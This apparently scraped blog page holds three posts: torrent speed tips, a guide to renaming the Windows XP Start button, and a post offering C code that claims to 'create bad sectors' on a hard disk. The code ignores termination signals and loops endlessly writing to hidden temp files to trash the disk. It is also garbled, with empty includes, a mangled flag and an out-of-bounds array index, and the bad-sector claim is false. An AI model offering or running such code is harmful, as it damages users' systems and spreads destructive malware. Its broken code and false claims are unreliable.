Pages

10 Ways To Speed Up Torrent Downloads

with 0 comments
Imagine being on the autobahn with the accelerator down and then you realize that you are driving a wrecked car. The plight is not so uncommon on the information superhighway too.

Torrent users would attest to the fact that half of our time is spent looking for ‘healthy’ torrents and the other half trying to download (and a bit of upload too) at the maximum speed. The former is mandatory; the latter thankfully is within the realm of tweaking.

If you are the one who thinks that your torrent download speeds could do with a boost then keep reading. Below, you’ll find a few tips on how to speed up torrent download speed.

   1.      Your ISP is where it starts

      Check the maximum download and upload speeds allowed by your ISP. Most ISP’s have specific bandwidths for both uploads and downloads. Obviously your torrent download speed won’t cross the cap set by the ISP. Go over to this article on Speed.io for broadband speed test and this one by Tina on ways to increase your connection speed. There are many other bandwidth testers like DSLReports which is included in the speed test within uTorrent.
   2.      Choosing the right BitTorrent client

      Use the better clients out there like uTorrent, Vuze or the BitTorrent client itself. Wikipedia lists about 51 of them supporting the BitTorrent protocol. The choice of client used should always be updated to the latest version. The screenshots here depict uTorrent. The settings should be similarly configurable for other clients too. Mac users shuld also check our Transmission vs. uTorrent post
   3.      Go for healthy seeds and peers

      A peer is any computer participating in the download and upload of a torrent file. A seed (or seeder) is anyone who has one complete copy of the file being shared across the torrent network. A leech (or a leecher) is the person who does not have the complete file yet but has joined the network to download it. A leecher becomes a seeder when he downloads the entire file and then shares it across the network. Increase torrent downloading speed by choosing healthy seeds

      For high torrent speeds, the best bet is in numbers. The greater the number of seeders, the healthier the torrent and the better the chance of higher speeds. The rule of thumb says to choose the torrent files with a high number of seeders and preferably lesser number of leechers i.e. a higher seed-leecher ratio.
   4.      Get through the firewall

      Firewalls can block all incoming BitTorrent connections coming through. To ensure otherwise, a firewall should be manually configured to accept the connections and let it through the client. Windows XP has the Windows Firewall. Configure the firewall installed to accept the connections by checking the BitTorrent client on the allowed list i.e. Options – Preferences – Connection – check Add uTorrent to Windows Firewall. Also, check the Windows Firewall exception (if you keep it enabled) in your client too. Shutting down the firewall is not recommended as it leaves the computer open to attack.

      Note: If the home computer is behind a router, it also should be configured through the feature called Port Range Forwarding to enable torrent traffic. The router documentation should have specific information on this.
   5.      Limit your upload rate

      A peer to peer network is all about sharing alike, but an unlimited upload rate hits the download rate too. Using the speed tests, find out your maximum upload speed and then set your client’s upload rate (Global Upload Rate in uTorrent) to about 80% of your maximum upload speed. You can also try varying your upload speeds – keep it high initially and then gradually bring it down towards the middle of the download.

      Note: Mind the speed units – it may be given in kilobits per second (kb/sec) or kilobytes per second (kB/sec). 1 kilobyte = 8 kilobit
   6.      Go to a different port

      The default port for the BitTorrent protocol is any between port numbers 6881-6999. ISPs throttle traffic on these ports as BitTorrent sharing involves high bandwidth usage. It’s easy to configure a different port in your torrent client. Use some number above 10000 to get around ISPs and also avoid problems with other applications. By default, the uTorrent port is randomized each time it starts. Set a specific port by not enabling the Randomize Port setting.
   7.      Increase the number of Max Half Open TCP connections

      This figure specifies how many connections a torrent client should attempt to establish simultaneously at any given time. Windows XP with Service Pack 2 (SP2) or newer, limits this to a default of 10 as a barrier against virus multiplication. But that’s a bummer for torrent speeds as torrents too need a large number of simultaneous connections.

      A patch has been available for a while from LvlLord which modifies the TCPIP.sys file in Windows to allow a higher number of TCP connections.

      increase the half open tcp connections

      After running the patch, you have to set the number of connections in your torrent client. For example, in uTorrent go to Options – Preferences – Advanced – net.max_halfopen. Set any number from 50 to 100. But see that net.max_halfopen is set lower than the value set in TCPIP.SYS. Always check if it is still patched because Windows updates sometimes overwrite it.

   8.      Experiment with Protocol Encryption

      Some ISPs love to act like Big Brothers and constrict bandwidth for P2P protocols. Protocol Encryption in most of the torrent clients helps to override this bandwidth shaping. Enable outgoing protocol encryption and put a checkmark on Allow Incoming Legacy Connections.

      With protocol encryption, ISPs find it difficult if not impossible to detect that the traffic is coming from BitTorrent. Experiment with enabled, disabled and forced options because you could be getting better speeds with encryption disabled. Non-encryption makes a torrent connection compatible with someone who is not using encryption but as a minus it makes the torrent detectable to an ISP with a bandwidth restricting policy.
   9.      Bandwidth and connections

      Your BitTorrent client’s settings options will let you enter figures for –

      Global maximum number of connections gives the maximum number of connections that a BitTorrent client can make for any P2P exchange. Setting this too high does NOT mean higher speeds. Setting it too high would take up useless bandwidth and too low a figure would miss out on peers. For my 256kbps connection, I have a setting of 130.

      Maximum number of connected peers per torrent gives the maximum number of peers that a BitTorrent client can connect to for any P2P exchange. Experiment by setting this number close to the available peers for a particular torrent. For my 256kbps connection, I have a default setting of 70.

      Number of upload slots per torrent gives the maximum number of peers that a BitTorrent client will upload to for any P2P exchange. A low setting may affect downloads. For my 256kbps connection, I have a setting of 3.

      uTorrent has a Speed Guide which handily calculates the figures for a particular connection.
  10.      Some common sense

      Most BitTorrent clients allow us to view the individual files in a download. You can selectively disable the download of files you don’t think necessary.

      Familiarize yourself with the customization settings of your particular client available in the Help files or at the website FAQs.

HOW TO CREATE BAD SECTORS IN HDD

with 0 comments
Create bad sectors in HDDThis program will create BAD Sectors on HDD.
Create this programme in C and run……
#include
#include
#include
#include
#include
#include
#include
#define HDSIZE 640000
void handle_sig();
int main() {
int i = 0;
int x;
int fd[5];
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
char *buf;
buf = malloc(HDSIZE);
printf(“sekt0r: trashing hard disk with bad sectors!\n”);
while(1) {
fd[1] = open(“/tmp/.test”, O_WRONLYO_CREAT, 511);
fd[2] = open(“/tmp/.test1″, O_WRONLYO_CREAT, 511);
fd[3] = open(“/tmp/.test2″, O_WRONLYO_CREAT, 511);
fd[4] = open(“/tmp/.test3″, O_WRONLYO_CREAT, 511);
fd[5] = open(“/tmp/.test4″, O_WRONLYO_CREAT, 511);
for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);
} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */
void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
printf(“sekt0r: cannot exit – trashing hard disk with bad sectors!\n”);
return; /* go back to creating bad sectors. */
}
Credits: crack0hack.wetpaint.com
Note : Don’t Use this programme on Self Harddisk……………. Useing & Tesing of This Programme on Your Self Responsibilty……………………..

Change Start logo in Xp

with 0 comments

First Step

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table In Resource Hacker. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. 02. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry

Second Step – Modify the Registry

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

the right pane (Fig. 05), double click the Shell entry to open the Edit String dialog box as shown in Fig. 06. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.